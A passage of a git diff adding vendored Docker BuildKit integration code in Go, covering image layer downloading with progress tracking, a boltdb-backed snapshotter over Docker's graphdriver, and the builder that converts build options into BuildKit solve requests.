+	r := image.NewRootFS()
+	rootFS, release, err := p.is.DownloadManager.Download(ctx, *r, runtime.GOOS, layers, pkgprogress.ChanOutput(pchan))
+	if err != nil {
+		return nil, err
+	}
+	stopProgress()
+
+	ref, err := p.is.CacheAccessor.GetFromSnapshotter(ctx, string(rootFS.ChainID()), cache.WithDescription(fmt.Sprintf("pulled from %s", p.ref)))
+	release()
+	if err != nil {
+		return nil, err
+	}
+
+	return ref, nil
+}
+
+// Fetch(ctx context.Context, desc ocispec.Descriptor) (io.ReadCloser, error)
+type layerDescriptor struct {
+	is      *imageSource
+	fetcher remotes.Fetcher
+	desc    ocispec.Descriptor
+	diffID  layer.DiffID
+	ref     ctdreference.Spec
+}
+
+func (ld *layerDescriptor) Key() string {
+	return "v2:" + ld.desc.Digest.String()
+}
+
+func (ld *layerDescriptor) ID() string {
+	return ld.desc.Digest.String()
+}
+
+func (ld *layerDescriptor) DiffID() (layer.DiffID, error) {
+	return ld.diffID, nil
+}
+
+func (ld *layerDescriptor) Download(ctx context.Context, progressOutput pkgprogress.Output) (io.ReadCloser, int64, error) {
+	rc, err := ld.fetcher.Fetch(ctx, ld.desc)
+	if err != nil {
+		return nil, 0, err
+	}
+	defer rc.Close()
+
+	refKey := remotes.MakeRefKey(ctx, ld.desc)
+
+	ld.is.ContentStore.Abort(ctx, refKey)
+
+	if err := content.WriteBlob(ctx, ld.is.ContentStore, refKey, rc, ld.desc); err != nil {
+		ld.is.ContentStore.Abort(ctx, refKey)
+		return nil, 0, err
+	}
+
+	ra, err := ld.is.ContentStore.ReaderAt(ctx, ld.desc)
+	if err != nil {
+		return nil, 0, err
+	}
+
+	return ioutil.NopCloser(content.NewReader(ra)), ld.desc.Size, nil
+}
+
+func (ld *layerDescriptor) Close() {
+	// ld.is.ContentStore.Delete(context.TODO(), ld.desc.Digest))
+}
+
+func (ld *layerDescriptor) Registered(diffID layer.DiffID) {
+	// Cache mapping from this layer's DiffID to the blobsum
+	ld.is.MetadataStore.Add(diffID, metadata.V2Metadata{Digest: ld.desc.Digest, SourceRepository: ld.ref.Locator})
+}
+
+func showProgress(ctx context.Context, ongoing *jobs, cs content.Store, pw progress.Writer) {
+	var (
+		ticker   = time.NewTicker(100 * time.Millisecond)
+		statuses = map[string]statusInfo{}
+		done     bool
+	)
+	defer ticker.Stop()
+
+	for {
+		select {
+		case <-ticker.C:
+		case <-ctx.Done():
+			done = true
+		}
+
+		resolved := "resolved"
+		if !ongoing.isResolved() {
+			resolved = "resolving"
+		}
+		statuses[ongoing.name] = statusInfo{
+			Ref:    ongoing.name,
+			Status: resolved,
+		}
+
+		actives := make(map[string]statusInfo)
+
+		if !done {
+			active, err := cs.ListStatuses(ctx)
+			if err != nil {
+				// log.G(ctx).WithError(err).Error("active check failed")
+				continue
+			}
+			// update status of active entries!
+			for _, active := range active {
+				actives[active.Ref] = statusInfo{
+					Ref:       active.Ref,
+					Status:    "downloading",
+					Offset:    active.Offset,
+					Total:     active.Total,
+					StartedAt: active.StartedAt,
+					UpdatedAt: active.UpdatedAt,
+				}
+			}
+		}
+
+		// now, update the items in jobs that are not in active
+		for _, j := range ongoing.jobs() {
+			refKey := remotes.MakeRefKey(ctx, j.Descriptor)
+			if a, ok := actives[refKey]; ok {
+				started := j.started
+				pw.Write(j.Digest.String(), progress.Status{
+					Action:  a.Status,
+					Total:   int(a.Total),
+					Current: int(a.Offset),
+					Started: &started,
+				})
+				continue
+			}
+
+			if !j.done {
+				info, err := cs.Info(context.TODO(), j.Digest)
+				if err != nil {
+					if errdefs.IsNotFound(err) {
+						// pw.Write(j.Digest.String(), progress.Status{
+						// 	Action: "waiting",
+						// })
+						continue
+					}
+				} else {
+					j.done = true
+				}
+
+				if done || j.done {
+					started := j.started
+					createdAt := info.CreatedAt
+					pw.Write(j.Digest.String(), progress.Status{
+						Action:    "done",
+						Current:   int(info.Size),
+						Total:     int(info.Size),
+						Completed: &createdAt,
+						Started:   &started,
+					})
+				}
+			}
+		}
+		if done {
+			return
+		}
+	}
+}
+
+// jobs provides a way of identifying the download keys for a particular task
+// encountering during the pull walk.
+//
+// This is very minimal and will probably be replaced with something more
+// featured.
+type jobs struct {
+	name     string
+	added    map[digest.Digest]job
+	mu       sync.Mutex
+	resolved bool
+}
+
+type job struct {
+	ocispec.Descriptor
+	done    bool
+	started time.Time
+}
+
+func newJobs(name string) *jobs {
+	return &jobs{
+		name:  name,
+		added: make(map[digest.Digest]job),
+	}
+}
+
+func (j *jobs) add(desc ocispec.Descriptor) {
+	j.mu.Lock()
+	defer j.mu.Unlock()
+
+	if _, ok := j.added[desc.Digest]; ok {
+		return
+	}
+	j.added[desc.Digest] = job{
+		Descriptor: desc,
+		started:    time.Now(),
+	}
+}
+
+func (j *jobs) jobs() []job {
+	j.mu.Lock()
+	defer j.mu.Unlock()
+
+	descs := make([]job, 0, len(j.added))
+	for _, j := range j.added {
+		descs = append(descs, j)
+	}
+	return descs
+}
+
+func (j *jobs) isResolved() bool {
+	j.mu.Lock()
+	defer j.mu.Unlock()
+	return j.resolved
+}
+
+type statusInfo struct {
+	Ref       string
+	Status    string
+	Offset    int64
+	Total     int64
+	StartedAt time.Time
+	UpdatedAt time.Time
+}
+
+func oneOffProgress(ctx context.Context, id string) func(err error) error {
+	pw, _, _ := progress.FromContext(ctx)
+	now := time.Now()
+	st := progress.Status{
+		Started: &now,
+	}
+	pw.Write(id, st)
+	return func(err error) error {
+		// TODO: set error on status
+		now := time.Now()
+		st.Completed = &now
+		pw.Write(id, st)
+		pw.Close()
+		return err
+	}
+}
+
+// cacheKeyFromConfig returns a stable digest from image config. If image config
+// is a known oci image we will use chainID of layers.
+func cacheKeyFromConfig(dt []byte) digest.Digest {
+	var img ocispec.Image
+	err := json.Unmarshal(dt, &img)
+	if err != nil {
+		return digest.FromBytes(dt)
+	}
+	if img.RootFS.Type != "layers" {
+		return digest.FromBytes(dt)
+	}
+	return identity.ChainID(img.RootFS.DiffIDs)
+}
diff --git a/vendor/github.com/docker/docker/builder/builder-next/adapters/snapshot/layer.go b/vendor/github.com/docker/docker/builder/builder-next/adapters/snapshot/layer.go
new file mode 100644
index 0000000000..d0aa6f28fa
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/builder-next/adapters/snapshot/layer.go
@@ -0,0 +1,113 @@
+package snapshot
+
+import (
+	"context"
+	"os"
+	"path/filepath"
+
+	"github.com/boltdb/bolt"
+	"github.com/docker/docker/layer"
+	"github.com/docker/docker/pkg/ioutils"
+	"github.com/pkg/errors"
+	"golang.org/x/sync/errgroup"
+)
+
+func (s *snapshotter) EnsureLayer(ctx context.Context, key string) ([]layer.DiffID, error) {
+	if l, err := s.getLayer(key, true); err != nil {
+		return nil, err
+	} else if l != nil {
+		return getDiffChain(l), nil
+	}
+
+	id, committed := s.getGraphDriverID(key)
+	if !committed {
+		return nil, errors.Errorf("can not convert active %s to layer", key)
+	}
+
+	info, err := s.Stat(ctx, key)
+	if err != nil {
+		return nil, err
+	}
+
+	eg, gctx := errgroup.WithContext(ctx)
+
+	// TODO: add flightcontrol
+
+	var parentChainID layer.ChainID
+	if info.Parent != "" {
+		eg.Go(func() error {
+			diffIDs, err := s.EnsureLayer(gctx, info.Parent)
+			if err != nil {
+				return err
+			}
+			parentChainID = layer.CreateChainID(diffIDs)
+			return nil
+		})
+	}
+
+	tmpDir, err := ioutils.TempDir("", "docker-tarsplit")
+	if err != nil {
+		return nil, err
+	}
+	defer os.RemoveAll(tmpDir)
+	tarSplitPath := filepath.Join(tmpDir, "tar-split")
+
+	var diffID layer.DiffID
+	var size int64
+	eg.Go(func() error {
+		parent := ""
+		if p := info.Parent; p != "" {
+			if l, err := s.getLayer(p, true); err != nil {
+				return err
+			} else if l != nil {
+				parent, err = getGraphID(l)
+				if err != nil {
+					return err
+				}
+			} else {
+				parent, _ = s.getGraphDriverID(info.Parent)
+			}
+		}
+		diffID, size, err = s.reg.ChecksumForGraphID(id, parent, "", tarSplitPath)
+		return err
+	})
+
+	if err := eg.Wait(); err != nil {
+		return nil, err
+	}
+
+	l, err := s.reg.RegisterByGraphID(id, parentChainID, diffID, tarSplitPath, size)
+	if err != nil {
+		return nil, err
+	}
+
+	if err := s.db.Update(func(tx *bolt.Tx) error {
+		b := tx.Bucket([]byte(key))
+		b.Put(keyChainID, []byte(l.ChainID()))
+		return nil
+	}); err != nil {
+		return nil, err
+	}
+
+	s.mu.Lock()
+	s.refs[key] = l
+	s.mu.Unlock()
+
+	return getDiffChain(l), nil
+}
+
+func getDiffChain(l layer.Layer) []layer.DiffID {
+	if p := l.Parent(); p != nil {
+		return append(getDiffChain(p), l.DiffID())
+	}
+	return []layer.DiffID{l.DiffID()}
+}
+
+func getGraphID(l layer.Layer) (string, error) {
+	if l, ok := l.(interface {
+		CacheID() string
+	}); ok {
+		return l.CacheID(), nil
+	}
+	return "", errors.Errorf("couldn't access cacheID for %s", l.ChainID())
+}
diff --git a/vendor/github.com/docker/docker/builder/builder-next/adapters/snapshot/snapshot.go b/vendor/github.com/docker/docker/builder/builder-next/adapters/snapshot/snapshot.go
new file mode 100644
index 0000000000..9934c8ae3a
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/builder-next/adapters/snapshot/snapshot.go
@@ -0,0 +1,445 @@
+package snapshot
+
+import (
+	"context"
+	"path/filepath"
+	"strconv"
+	"strings"
+	"sync"
+
+	"github.com/boltdb/bolt"
+	"github.com/containerd/containerd/mount"
+	"github.com/containerd/containerd/snapshots"
+	"github.com/docker/docker/daemon/graphdriver"
+	"github.com/docker/docker/layer"
+	"github.com/moby/buildkit/identity"
+	"github.com/moby/buildkit/snapshot"
+	digest "github.com/opencontainers/go-digest"
+	"github.com/pkg/errors"
+)
+
+var keyParent = []byte("parent")
+var keyCommitted = []byte("committed")
+var keyChainID = []byte("chainid")
+var keySize = []byte("size")
+
+// Opt defines options for creating the snapshotter
+type Opt struct {
+	GraphDriver graphdriver.Driver
+	LayerStore  layer.Store
+	Root        string
+}
+
+type graphIDRegistrar interface {
+	RegisterByGraphID(string, layer.ChainID, layer.DiffID, string, int64) (layer.Layer, error)
+	Release(layer.Layer) ([]layer.Metadata, error)
+	checksumCalculator
+}
+
+type checksumCalculator interface {
+	ChecksumForGraphID(id, parent, oldTarDataPath, newTarDataPath string) (diffID layer.DiffID, size int64, err error)
+}
+
+type snapshotter struct {
+	opt Opt
+
+	refs map[string]layer.Layer
+	db   *bolt.DB
+	mu   sync.Mutex
+	reg  graphIDRegistrar
+}
+
+var _ snapshot.SnapshotterBase = &snapshotter{}
+
+// NewSnapshotter creates a new snapshotter
+func NewSnapshotter(opt Opt) (snapshot.SnapshotterBase, error) {
+	dbPath := filepath.Join(opt.Root, "snapshots.db")
+	db, err := bolt.Open(dbPath, 0600, nil)
+	if err != nil {
+		return nil, errors.Wrapf(err, "failed to open database file %s", dbPath)
+	}
+
+	reg, ok := opt.LayerStore.(graphIDRegistrar)
+	if !ok {
+		return nil, errors.Errorf("layerstore doesn't support graphID registration")
+	}
+
+	s := &snapshotter{
+		opt:  opt,
+		db:   db,
+		refs: map[string]layer.Layer{},
+		reg:  reg,
+	}
+	return s, nil
+}
+
+func (s *snapshotter) Prepare(ctx context.Context, key, parent string, opts ...snapshots.Opt) error {
+	origParent := parent
+	if parent != "" {
+		if l, err := s.getLayer(parent, false); err != nil {
+			return err
+		} else if l != nil {
+			parent, err = getGraphID(l)
+			if err != nil {
+				return err
+			}
+		} else {
+			parent, _ = s.getGraphDriverID(parent)
+		}
+	}
+	if err := s.opt.GraphDriver.Create(key, parent, nil); err != nil {
+		return err
+	}
+	if err := s.db.Update(func(tx *bolt.Tx) error {
+		b, err := tx.CreateBucketIfNotExists([]byte(key))
+		if err != nil {
+			return err
+		}
+
+		if err := b.Put(keyParent, []byte(origParent)); err != nil {
+			return err
+		}
+		return nil
+	}); err != nil {
+		return err
+	}
+	return nil
+}
+
+func (s *snapshotter) chainID(key string) (layer.ChainID, bool) {
+	if strings.HasPrefix(key, "sha256:") {
+		dgst, err := digest.Parse(key)
+		if err != nil {
+			return "", false
+		}
+		return layer.ChainID(dgst), true
+	}
+	return "", false
+}
+
+func (s *snapshotter) getLayer(key string, withCommitted bool) (layer.Layer, error) {
+	s.mu.Lock()
+	l, ok := s.refs[key]
+	if !ok {
+		id, ok := s.chainID(key)
+		if !ok {
+			if !withCommitted {
+				s.mu.Unlock()
+				return nil, nil
+			}
+			if err := s.db.View(func(tx *bolt.Tx) error {
+				b := tx.Bucket([]byte(key))
+				if b == nil {
+					return nil
+				}
+				v := b.Get(keyChainID)
+				if v != nil {
+					id = layer.ChainID(v)
+				}
+				return nil
+			}); err != nil {
+				s.mu.Unlock()
+				return nil, err
+			}
+			if id == "" {
+				s.mu.Unlock()
+				return nil, nil
+			}
+		}
+		var err error
+		l, err = s.opt.LayerStore.Get(id)
+		if err != nil {
+			s.mu.Unlock()
+			return nil, err
+		}
+		s.refs[key] = l
+		if err := s.db.Update(func(tx *bolt.Tx) error {
+			_, err := tx.CreateBucketIfNotExists([]byte(key))
+			return err
+		}); err != nil {
+			s.mu.Unlock()
+			return nil, err
+		}
+	}
+	s.mu.Unlock()
+
+	return l, nil
+}
+
+func (s *snapshotter) getGraphDriverID(key string) (string, bool) {
+	var gdID string
+	if err := s.db.View(func(tx *bolt.Tx) error {
+		b := tx.Bucket([]byte(key))
+		if b == nil {
+			return errors.Errorf("not found") // TODO: typed
+		}
+		v := b.Get(keyCommitted)
+		if v != nil {
+			gdID = string(v)
+		}
+		return nil
+	}); err != nil || gdID == "" {
+		return key, false
+	}
+	return gdID, true
+}
+
+func (s *snapshotter) Stat(ctx context.Context, key string) (snapshots.Info, error) {
+	inf := snapshots.Info{
+		Kind: snapshots.KindActive,
+	}
+
+	l, err := s.getLayer(key, false)
+	if err != nil {
+		return snapshots.Info{}, err
+	}
+	if l != nil {
+		if p := l.Parent(); p != nil {
+			inf.Parent = p.ChainID().String()
+		}
+		inf.Kind = snapshots.KindCommitted
+		inf.Name = key
+		return inf, nil
+	}
+
+	l, err = s.getLayer(key, true)
+	if err != nil {
+		return snapshots.Info{}, err
+	}
+
+	id, committed := s.getGraphDriverID(key)
+	if committed {
+		inf.Kind = snapshots.KindCommitted
+	}
+
+	if err := s.db.View(func(tx *bolt.Tx) error {
+		b := tx.Bucket([]byte(id))
+		if b == nil && l == nil {
+			return errors.Errorf("snapshot %s not found", id) // TODO: typed
+		}
+		inf.Name = key
+		if b != nil {
+			v := b.Get(keyParent)
+			if v != nil {
+				inf.Parent = string(v)
+				return nil
+			}
+		}
+		if l != nil {
+			if p := l.Parent(); p != nil {
+				inf.Parent = p.ChainID().String()
+			}
+			inf.Kind = snapshots.KindCommitted
+		}
+		return nil
+	}); err != nil {
+		return snapshots.Info{}, err
+	}
+	return inf, nil
+}
+
+func (s *snapshotter) Mounts(ctx context.Context, key string) (snapshot.Mountable, error) {
+	l, err := s.getLayer(key, true)
+	if err != nil {
+		return nil, err
+	}
+	if l != nil {
+		id := identity.NewID()
+		rwlayer, err := s.opt.LayerStore.CreateRWLayer(id, l.ChainID(), nil)
+		if err != nil {
+			return nil, err
+		}
+		rootfs, err := rwlayer.Mount("")
+		if err != nil {
+			return nil, err
+		}
+		mnt := []mount.Mount{{
+			Source:  rootfs.Path(),
+			Type:    "bind",
+			Options: []string{"rbind"},
+		}}
+		return &constMountable{
+			mounts: mnt,
+			release: func() error {
+				_, err := s.opt.LayerStore.ReleaseRWLayer(rwlayer)
+				return err
+			},
+		}, nil
+	}
+
+	id, _ := s.getGraphDriverID(key)
+
+	rootfs, err := s.opt.GraphDriver.Get(id, "")
+	if err != nil {
+		return nil, err
+	}
+	mnt := []mount.Mount{{
+		Source:  rootfs.Path(),
+		Type:    "bind",
+		Options: []string{"rbind"},
+	}}
+	return &constMountable{
+		mounts: mnt,
+		release: func() error {
+			return s.opt.GraphDriver.Put(id)
+		},
+	}, nil
+}
+
+func (s *snapshotter) Remove(ctx context.Context, key string) error {
+	l, err := s.getLayer(key, true)
+	if err != nil {
+		return err
+	}
+
+	id, _ := s.getGraphDriverID(key)
+
+	var found bool
+	if err := s.db.Update(func(tx *bolt.Tx) error {
+		found = tx.Bucket([]byte(key)) != nil
+		if found {
+			tx.DeleteBucket([]byte(key))
+			if id != key {
+				tx.DeleteBucket([]byte(id))
+			}
+		}
+		return nil
+	}); err != nil {
+		return err
+	}
+
+	if l != nil {
+		s.mu.Lock()
+		delete(s.refs, key)
+		s.mu.Unlock()
+		_, err := s.opt.LayerStore.Release(l)
+		return err
+	}
+
+	if !found { // this happens when removing views
+		return nil
+	}
+
+	return s.opt.GraphDriver.Remove(id)
+}
+
+func (s *snapshotter) Commit(ctx context.Context, name, key string, opts ...snapshots.Opt) error {
+	return s.db.Update(func(tx *bolt.Tx) error {
+		b, err := tx.CreateBucketIfNotExists([]byte(name))
+		if err != nil {
+			return err
+		}
+		if err := b.Put(keyCommitted, []byte(key)); err != nil {
+			return err
+		}
+		return nil
+	})
+}
+
+func (s *snapshotter) View(ctx context.Context, key, parent string, opts ...snapshots.Opt) (snapshot.Mountable, error) {
+	return s.Mounts(ctx, parent)
+}
+
+func (s *snapshotter) Walk(ctx context.Context, fn func(context.Context, snapshots.Info) error) error {
+	return errors.Errorf("not-implemented")
+}
+
+func (s *snapshotter) Update(ctx context.Context, info snapshots.Info, fieldpaths ...string) (snapshots.Info, error) {
+	// not implemented
+	return s.Stat(ctx, info.Name)
+}
+
+func (s *snapshotter) Usage(ctx context.Context, key string) (us snapshots.Usage, retErr error) {
+	usage := snapshots.Usage{}
+	if l, err := s.getLayer(key, true); err != nil {
+		return usage, err
+	} else if l != nil {
+		s, err := l.DiffSize()
+		if err != nil {
+			return usage, err
+		}
+		usage.Size = s
+		return usage, nil
+	}
+
+	size := int64(-1)
+	if err := s.db.View(func(tx *bolt.Tx) error {
+		b := tx.Bucket([]byte(key))
+		if b == nil {
+			return nil
+		}
+		v := b.Get(keySize)
+		if v != nil {
+			s, err := strconv.Atoi(string(v))
+			if err != nil {
+				return err
+			}
+			size = int64(s)
+		}
+		return nil
+	}); err != nil {
+		return usage, err
+	}
+
+	if size != -1 {
+		usage.Size = size
+		return usage, nil
+	}
+
+	id, _ := s.getGraphDriverID(key)
+
+	info, err := s.Stat(ctx, key)
+	if err != nil {
+		return usage, err
+	}
+	var parent string
+	if info.Parent != "" {
+		if l, err := s.getLayer(info.Parent, false); err != nil {
+			return usage, err
+		} else if l != nil {
+			parent, err = getGraphID(l)
+			if err != nil {
+				return usage, err
+			}
+		} else {
+			parent, _ = s.getGraphDriverID(info.Parent)
+		}
+	}
+
+	diffSize, err := s.opt.GraphDriver.DiffSize(id, parent)
+	if err != nil {
+		return usage, err
+	}
+
+	if err := s.db.Update(func(tx *bolt.Tx) error {
+		b, err := tx.CreateBucketIfNotExists([]byte(key))
+		if err != nil {
+			return err
+		}
+		return b.Put(keySize, []byte(strconv.Itoa(int(diffSize))))
+	}); err != nil {
+		return usage, err
+	}
+	usage.Size = diffSize
+	return usage, nil
+}
+
+func (s *snapshotter) Close() error {
+	return s.db.Close()
+}
+
+type constMountable struct {
+	mounts  []mount.Mount
+	release func() error
+}
+
+func (m *constMountable) Mount() ([]mount.Mount, error) {
+	return m.mounts, nil
+}
+
+func (m *constMountable) Release() error {
+	if m.release == nil {
+		return nil
+	}
+	return m.release()
+}
diff --git a/vendor/github.com/docker/docker/builder/builder-next/builder.go b/vendor/github.com/docker/docker/builder/builder-next/builder.go
new file mode 100644
index 0000000000..8c48d9abbf
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/builder-next/builder.go
@@ -0,0 +1,419 @@
+package buildkit
+
+import (
+	"context"
+	"encoding/json"
+	"io"
+	"strings"
+	"sync"
+	"time"
+
+	"github.com/containerd/containerd/content"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/backend"
+	"github.com/docker/docker/builder"
+	"github.com/docker/docker/daemon/images"
+	"github.com/docker/docker/pkg/jsonmessage"
+	controlapi "github.com/moby/buildkit/api/services/control"
+	"github.com/moby/buildkit/control"
+	"github.com/moby/buildkit/identity"
+	"github.com/moby/buildkit/session"
+	"github.com/moby/buildkit/util/tracing"
+	"github.com/pkg/errors"
+	"golang.org/x/sync/errgroup"
+	grpcmetadata "google.golang.org/grpc/metadata"
+)
+
+// Opt is option struct required for creating the builder
+type Opt struct {
+	SessionManager *session.Manager
+	Root           string
+	Dist           images.DistributionServices
+}
+
+// Builder can build using BuildKit backend
+type Builder struct {
+	controller     *control.Controller
+	reqBodyHandler *reqBodyHandler
+
+	mu   sync.Mutex
+	jobs map[string]*buildJob
+}
+
+// New creates a new builder
+func New(opt Opt) (*Builder, error) {
+	reqHandler := newReqBodyHandler(tracing.DefaultTransport)
+
+	c, err := newController(reqHandler, opt)
+	if err != nil {
+		return nil, err
+	}
+	b := &Builder{
+		controller:     c,
+		reqBodyHandler: reqHandler,
+		jobs:           map[string]*buildJob{},
+	}
+	return b, nil
+}
+
+// Cancel cancels a build using ID
+func (b *Builder) Cancel(ctx context.Context, id string) error {
+	b.mu.Lock()
+	if j, ok := b.jobs[id]; ok && j.cancel != nil {
+		j.cancel()
+	}
+	b.mu.Unlock()
+	return nil
+}
+
+// DiskUsage returns a report about space used by build cache
+func (b *Builder) DiskUsage(ctx context.Context) ([]*types.BuildCache, error) {
+	duResp, err := b.controller.DiskUsage(ctx, &controlapi.DiskUsageRequest{})
+	if err != nil {
+		return nil, err
+	}
+
+	var items []*types.BuildCache
+	for _, r := range duResp.Record {
+		items = append(items, &types.BuildCache{
+			ID:      r.ID,
+			Mutable: r.Mutable,
+			InUse:   r.InUse,
+			Size:    r.Size_,
+
+			CreatedAt:   r.CreatedAt,
+			LastUsedAt:  r.LastUsedAt,
+			UsageCount:  int(r.UsageCount),
+			Parent:      r.Parent,
+			Description: r.Description,
+		})
+	}
+	return items, nil
+}
+
+// Prune clears all reclaimable build cache
+func (b *Builder) Prune(ctx context.Context) (int64, error) {
+	ch := make(chan *controlapi.UsageRecord)
+
+	eg, ctx := errgroup.WithContext(ctx)
+
+	eg.Go(func() error {
+		defer close(ch)
+		return b.controller.Prune(&controlapi.PruneRequest{}, &pruneProxy{
+			streamProxy: streamProxy{ctx: ctx},
+			ch:          ch,
+		})
+	})
+
+	var size int64
+	eg.Go(func() error {
+		for r := range ch {
+			size += r.Size_
+		}
+		return nil
+	})
+
+	if err := eg.Wait(); err != nil {
+		return 0, err
+	}
+
+	return size, nil
+}
+
+// Build executes a build request
+func (b *Builder) Build(ctx context.Context, opt backend.BuildConfig) (*builder.Result, error) {
+	var rc = opt.Source
+
+	if buildID := opt.Options.BuildID; buildID != "" {
+		b.mu.Lock()
+
+		upload := false
+		if strings.HasPrefix(buildID, "upload-request:") {
+			upload = true
+			buildID = strings.TrimPrefix(buildID, "upload-request:")
+		}
+
+		if _, ok := b.jobs[buildID]; !ok {
+			b.jobs[buildID] = newBuildJob()
+		}
+		j := b.jobs[buildID]
+		var cancel func()
+		ctx, cancel = context.WithCancel(ctx)
+		j.cancel = cancel
+		b.mu.Unlock()
+
+		if upload {
+			ctx2, cancel := context.WithTimeout(ctx, 5*time.Second)
+			defer cancel()
+			err := j.SetUpload(ctx2, rc)
+			return nil, err
+		}
+
+		if remoteContext := opt.Options.RemoteContext; remoteContext == "upload-request" {
+			ctx2, cancel := context.WithTimeout(ctx, 5*time.Second)
+			defer cancel()
+			var err error
+			rc, err = j.WaitUpload(ctx2)
+			if err != nil {
+				return nil, err
+			}
+			opt.Options.RemoteContext = ""
+		}
+
+		defer func() {
+			delete(b.jobs, buildID)
+		}()
+	}
+
+	var out builder.Result
+
+	id := identity.NewID()
+
+	frontendAttrs := map[string]string{}
+
+	if opt.Options.Target != "" {
+		frontendAttrs["target"] = opt.Options.Target
+	}
+
+	if opt.Options.Dockerfile != "" && opt.Options.Dockerfile != "." {
+		frontendAttrs["filename"] = opt.Options.Dockerfile
+	}
+
+	if opt.Options.RemoteContext != "" {
+		if opt.Options.RemoteContext != "client-session" {
+			frontendAttrs["context"] = opt.Options.RemoteContext
+		}
+	} else {
+		url, cancel := b.reqBodyHandler.newRequest(rc)
+		defer cancel()
+		frontendAttrs["context"] = url
+	}
+
+	cacheFrom := append([]string{}, opt.Options.CacheFrom...)
+
+	frontendAttrs["cache-from"] = strings.Join(cacheFrom, ",")
+
+	for k, v := range opt.Options.BuildArgs {
+		if v == nil {
+			continue
+		}
+		frontendAttrs["build-arg:"+k] = *v
+	}
+
+	for k, v := range opt.Options.Labels {
+		frontendAttrs["label:"+k] = v
+	}
+
+	if opt.Options.NoCache {
+		frontendAttrs["no-cache"] = ""
+	}
+
+	exporterAttrs := map[string]string{}
+
+	if len(opt.Options.Tags) > 0 {
+		exporterAttrs["name"] = strings.Join(opt.Options.Tags, ",")
+	}
+
+	req := &controlapi.SolveRequest{
+		Ref:           id,
+		Exporter:      "moby",
+		ExporterAttrs: exporterAttrs,
+		Frontend:      "dockerfile.v0",
+		FrontendAttrs: frontendAttrs,
+		Session:       opt.Options.SessionID,
+	}
+
+	eg, ctx := errgroup.WithContext(ctx)
+
+	eg.Go(func() error {
+		resp, err := b.controller.Solve(ctx, req)
+		if err != nil {
+			return err
+		}
+		id, ok := resp.ExporterResponse["containerimage.digest"]
+		if !ok {
+			return errors.Errorf("missing image id")
+		}
+		out.ImageID = id
+		return nil
+	})
+
+	ch := make(chan *controlapi.StatusResponse)
+
+	eg.Go(func() error {
+		defer close(ch)
+		return b.controller.Status(&controlapi.StatusRequest{
+			Ref: id,
+		}, &statusProxy{streamProxy: streamProxy{ctx: ctx}, ch: ch})
+	})
+
+	eg.Go(func() error {
+		for sr := range ch {
+			dt, err := sr.Marshal()
+			if err != nil {
+				return err
+			}
+
+			auxJSONBytes, err := json.Marshal(dt)
+			if err != nil {
+				return err
+			}
+			auxJSON := new(json.RawMessage)
+			*auxJSON = auxJSONBytes
+			msgJSON, err := json.Marshal(&jsonmessage.JSONMessage{ID: "moby.buildkit.trace", Aux: auxJSON})
+			if err != nil {
+				return err
+			}
+			msgJSON = append(msgJSON, []byte("\r\n")...)
+			n, err := opt.ProgressWriter.Output.Write(msgJSON)
+			if err != nil {
+				return err
+			}
+			if n != len(msgJSON) {
+				return io.ErrShortWrite
+			}
+		}
+		return nil
+	})
+
+	if err := eg.Wait(); err != nil {
+		return nil, err
+	}
+
+	return &out, nil
+}
+
+type streamProxy struct {
+	ctx context.Context
+}
+
+func (sp *streamProxy) SetHeader(_ grpcmetadata.MD) error {
+	return nil
+}
+
+func (sp *streamProxy) SendHeader(_ grpcmetadata.MD) error {
+	return nil
+}
+
+func (sp *streamProxy) SetTrailer(_ grpcmetadata.MD) {
+}
+
+func (sp *streamProxy) Context() context.Context {
+	return sp.ctx
+}
+func (sp *streamProxy) RecvMsg(m interface{}) error {
+	return io.EOF
+}
+
+type statusProxy struct {
+	streamProxy
+	ch chan *controlapi.StatusResponse
+}
+
+func (sp *statusProxy) Send(resp *controlapi.StatusResponse) error {
+	return sp.SendMsg(resp)
+}
+func (sp *statusProxy) SendMsg(m interface{}) error {
+	if sr, ok := m.(*controlapi.StatusResponse); ok {
+		sp.ch <- sr
+	}
+	return nil
+}
+
+type pruneProxy struct {
+	streamProxy
+	ch chan *controlapi.UsageRecord
+}
+
+func (sp *pruneProxy) Send(resp *controlapi.UsageRecord) error {
+	return sp.SendMsg(resp)
+}
+func (sp *pruneProxy) SendMsg(m interface{}) error {
+	if sr, ok := m.(*controlapi.UsageRecord); ok {
+		sp.ch <- sr
+	}
+	return nil
+}
+
+type contentStoreNoLabels struct {
+	content.Store
+}
+
+func (c *contentStoreNoLabels) Update(ctx context.Context, info content.Info, fieldpaths ...string) (content.Info, error) {
+	return content.Info{}, nil
+}
+
+type wrapRC struct {
+	io.ReadCloser
+	once   sync.Once
+	err    error
+	waitCh chan struct{}
+}
+
+func (w *wrapRC) Read(b []byte) (int, error) {
+	n, err := w.ReadCloser.Read(b)
+	if err != nil {
+		e := err
+		if e == io.EOF {
+			e = nil
+		}
+		w.close(e)
+	}
+	return n, err
+}
+
+func (w *wrapRC) Close() error {
+	err := w.ReadCloser.Close()
+	w.close(err)
+	return err
+}
+
+func (w *wrapRC) close(err error) {
+	w.once.Do(func() {
+		w.err = err
+		close(w.waitCh)
+	})
+}
+
+func (w *wrapRC) wait() error {
+	<-w.waitCh
+	return w.err
+}
+
+type buildJob struct {
+	cancel func()
+	waitCh chan func(io.ReadCloser) error
+}
+
+func newBuildJob() *buildJob {
+	return &buildJob{waitCh: make(chan func(io.ReadCloser) error)}
+}
+
+func (j *buildJob) WaitUpload(ctx context.Context) (io.ReadCloser, error) {
+	done := make(chan struct{})
+
+	var upload io.ReadCloser
+	fn := func(rc io.ReadCloser) error {
+		w := &wrapRC{ReadCloser: rc, waitCh: make(chan struct{})}
+		upload = w
+		close(done)
+		return w.wait()
+	}
+
+	select {
+	case <-ctx.Done():
+		return nil, ctx.Err()
+	case j.waitCh <- fn:
+		<-done
+		return upload, nil
+	}
+}
+
+func (j *buildJob) SetUpload(ctx context.Context, rc io.ReadCloser) error {
+	select {
+	case <-ctx.Done():
+		return ctx.Err()
+	case fn := <-j.waitCh:
+		return fn(rc)
+	}
+}
diff --git a/vendor/github.com/docker/docker/builder/builder-next/controller.go b/vendor/github.com/docker/docker/builder/builder-next/controller.go
new file mode 100644
index 0000000000..2956affa79
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/builder-next/controller.go
@@ -0,0 +1,157 @@
+package buildkit
+
+import (
+	"net/http"
+	"os"
+	"path/filepath"
+
+	"github.com/containerd/containerd/content/local"
